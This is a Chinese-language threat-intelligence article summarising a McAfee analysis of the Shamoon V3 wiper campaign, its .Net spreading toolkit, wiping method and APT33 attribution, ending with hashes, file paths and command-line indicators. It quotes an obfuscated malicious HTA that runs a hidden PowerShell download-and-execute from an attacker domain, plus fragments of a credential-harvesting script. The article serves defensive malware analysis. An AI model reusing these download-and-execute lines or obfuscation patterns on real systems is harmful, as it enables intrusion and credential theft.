在上週,McAfee高級威脅研究小組發佈了一篇分析文章。在這篇文章中,該研究小組分析了針對中東和歐洲企業的新一波Shamoon“wiper(磁盤擦除惡意軟件)”攻擊活動,並討論了最新Shamoon攻擊活動與此前Shamoon攻擊活動的區別。其中最值得關注的是,最新版本的Shamoon(Shamoon V3)作為一個wiper模塊,也作為一種獨立的惡意軟件被使用。
基於對Shamoon V3的分析以及其他一些線索,,該研究小組得出了這樣一個結論,這些攻擊背後的幕後黑手很可能是伊朗黑客組織APT33,或一個試圖偽裝成APT33的黑客組織。
在2016到2017年期間的Shamoon攻擊活動中,攻擊者同時使用了Shamoon V2和另一種wiper——Stonedrill。而在2018年的攻擊活動中,該研究小組觀察到了Shamoon V3和另一款最初由賽門鐵克提到的wiper——Filerase。
該研究小組的分析表明,最新版本的Shamoon似乎只是一個包含多個模塊的.Net工具包的一部分。具體來說,該研究小組確認了以下模塊:
- OCLC.exe:用於讀取攻擊者創建的目標計算機列表,並負責運行第二個工具spreader.exe。
- Spreader.exe:用於向目標計算機傳播wiper。另外,它也被用於獲取有關操作系統版本的信息。
- SpreaderPsexec.exe:與spreader.exe類似,但它使用的是psexec.exe來遠程執行wiper。
- SlHost.exe:wiper模塊,遍歷系統並擦除每一個目標文件。
這也反映出,至少有多名開發人員參與了為最新一波攻擊準備惡意軟件的工作。該研究小組曾在上一篇文章中指出,Shamoon V3作為.Net工具包中的一個wiper模塊,它也可作為一種獨立的惡意軟件供其他攻擊組織使用。從最近的這些攻擊來看,這種假設似乎得到了證實。該研究小組還了解到,攻擊者在數個月前就已經啟動了新活動的前期準備工作,目標旨在通過wiper的執行來破壞目標系統。
這篇文章提供了有關新一波Shamoon攻擊的更多見解,以及對.Net工具包的詳細分析。
地緣政治背景
與此前一樣,攻擊的動機尚不明確。因為,Shamoon V1攻擊的是位於中東的兩個目標,Shamoon V2攻擊的是位於沙特阿拉伯的多個目標,而Shamoon V3利用歐洲的供應商對中東企業發起了供應鏈攻擊。
在這個.Net工具包中,該研究小組發現瞭如下ASCII圖案:
這些字符組成了一個類似於阿拉伯文“تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ”的圖案。這是古蘭經(Surah Masad, Ayat 1 [111:1])中的一句話,意思是“願火焰之父的雙手毀滅吧!他已經毀滅。”
攻擊流程
惡意軟件是如何進入受害者的網絡的?
該研究小組的分析表明,攻擊者在前期準備階段創建了一些與某些合法域名(提供就業機會的網站)非常相似的網站。例如:
Hxxp://possibletarget.ddns.com:880/JobOffering
由該研究小組發現的許多URL都與主要在中東運營的能源企業有關,其中一些網站還包含有執行其他payload的惡意HTML應用程序文件,其餘網站則旨在誘使受害者使用自己的憑證進行登錄。根據McAfee的遙測數據,這些攻擊似乎是從2018年8月底開始的,而目的就是收集這些憑證。
以下是一個惡意HTML應用程序文件的代碼示例:
YjDrMeQhBOsJZ = “WS”
wcpRKUHoZNcZpzPzhnJw = “crip”
RulsTzxTrzYD = “t.Sh”
MPETWYrrRvxsCx = “ell”
PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)
OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)
ULRXZmHsCORQNoLHPxW = “cm”
zhKokjoiBdFhTLiGUQD = “d.e”
KoORGlpnUicmMHtWdpkRwmXeQN = “xe”
KoORGlpnUicmMHtWdp = “.”
KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)
OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)
OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc
上面這個腳本被用於在受害者的計算機上打開一個命令shell,並從外部下載一個PowerShell腳本。對PowerShell腳本的分析表明,它被用於收集用戶名、密碼和域名等信息。以下是PowerShell腳本的部分代碼:
function primer {
if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}
$o=”$env:userdomain\$u
$env:computername
$env:PROCESSOR_ARCHITECTURE
通過收集到的憑證,攻擊者能夠登錄到目標網絡中,並傳播wiper。
.Net工具包
如上所述,新一波Shamoon攻擊是通過一個.Net工具包進行的,旨在傳播ShamoonV3和Filerase。
第一個模塊(OCLC.exe)被用於讀取存儲在兩個本地目錄(“shutter”和“light”)中的兩個文本文件,它們包含有目標計算機列表。
另外,OCLC.exe也被用於啟動一個新的隱藏命令窗口進程來運行第二個模塊Spreader.exe,該模塊被用於使用上述兩個文本文件作為參數,以傳播ShamoonV3和Filerase。
首先,Spreader.exe模塊會使用上述包含目標計算機列表和Windows版本的兩個文本文件作為參數,以檢查目標計算機的Windows版本。
然後,將可執行文件(Shamoon和Filerase)放入文件夾“Net2”中。
另外,它還會在遠程計算機上創建一個文件夾:C:\\Windows\System32\Program Files\Internet Explorer\Signing。
然後,將上述可執行文件複製到該文件夾中。
接下來,它會創建一個批處理文件“\\RemoteMachine\admin$\\process.bat”來運行遠程計算機上的可執行文件。需要注意的是,這個批處理文件包含了可執行文件的路徑。然後,它會設置運行批處理文件的權限。
如果上述過程失敗,Spreader.exe模塊還會創建一個名為“NotFound.txt”的文本文件,其中包含目標計算機名稱和操作系統版本。攻擊者可以通過它來追蹤傳播過程中出現的問題。
以下展示的是上述過程所涉及到的一些函數:
如果在文件夾“Net2”中不存在可執行文件,Spreader.exe模塊則會檢查文件夾“all”和“Net4”。
為了傳播wiper,攻擊者還使用了另一個模塊SpreaderPsexec.exe。需要說明的是,Psexec.exe是微軟PSTools工具中的一種用於遠程執行命令的管理工具。
這裡的區別在於,SpreaderPsexec.exe使用的Psexec.exe存儲在文件夾“Net2”中。這意味著它也可以在其他計算機上使用,以進一步傳播wiper。
wiper包含三個選項:
- SilentMode:在沒有任何輸出的情況下運行wiper。
- BypassAcl:提升權限。值得注意的是,它始終是開啟的。
- PrintStackTrace:追蹤已擦除的文件夾和文件的數量。
如上所述,BypassAcl始終是開啟的(始終為“true” )。它為wiper提供了以下權限:
- SeBackupPrivilege
- SeRestorePrivilege
- SeTakeOwnershipPrivilege
- SeSecurityPrivilege
為了找到目標文件,wiper使用了GetFullPath函數來獲取路徑。
它會擦除找到的每一個目標文件夾和文件。
正如文章一開頭所說的那樣,它能夠遍歷系統每一個文件夾中的每一個文件。
對於要擦除的文件和文件夾,wiper首先會移除它們的“只讀”屬性。
接下來,它會將每個文件的創建、修改及訪問時間都更改為3000年1月1日 12:01:01。
然後,它會使用隨機字符串對每個文件進行兩次重寫。
它首先會使用帶有ACCESS_MASK DELETE flag的API CreateFile擦除文件。
然後,使用FILE_DISPOSITION_INFORMATION擦除文件。
ProcessTracker函數則被用來追蹤擦除的情況。
總結
McAfee高級威脅研究小組表示,在2017年的Shamoon攻擊浪潮中,他們觀察到了兩種wiper。在2018年12月的攻擊中,他們觀察到了類似的特徵。採用“工具包”的形式,攻擊者可以通過受害者的網絡來傳播wiper模塊。工具包是採用.Net編寫的,且沒有經過混淆處理。這與作為wiper模塊的Shamoon V3不同,它的代碼是經過加密處理的,作為一種逃避安全檢測的手段。
很難確定這些攻擊的動機,因為McAfee高級威脅研究小組還沒有找到足夠的線索。但他們表示,確實在Shamoon V3中看到了出現在Shamoon V2中的技術。另外,政治聲明似乎已經成為Shamoon攻擊的一部分。在V1中,攻擊者使用了一張正在燃燒的美國國旗的圖片。在V2中,攻擊者使用了一張溺亡的敘利亞男孩的圖片(附帶有也門阿拉伯語的文字),似乎暗指敘利亞和也門的衝突。現在,我們在V3中看到了一段摘自《古蘭經》的句子,可能預示著攻擊的動機與另一場中東衝突有關。
通過對比在這些攻擊中使用的TTP(戰術、技術和流程),以及域名和工具(如FireEye在其報告中所描述的),McAfee高級威脅研究小組得出結論,這些攻擊背後的幕後黑手很可能是伊朗黑客組織APT33,或一個試圖偽裝成APT33的黑客組織。
IOC
散列值:
- OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
- Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
- SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
- Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a
文件路徑和文件名:
- C:\net2\
- C:\all\
- C:\net4\
- C:\windows\system32\
- C:\\Windows\System32\Program Files\Internet Explorer\Signing
- \\admin$\process.bat
- NothingFound.txt
- MaintenaceSrv32.exe
- MaintenaceSrv64.exe
- SlHost.exe
- OCLC.exe
- Spreader.exe
- SpreaderPsexec.exe
命令行:
- cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
- cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
- MaintenaceSrv32.exe LocalService
- cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
- MaintenaceSrv32.exe service
本文由 黑客視界 綜合網絡整理,圖片源自網絡;轉載請註明“轉自黑客視界”,並附上鍊接。
閱讀更多 黑客視界 的文章
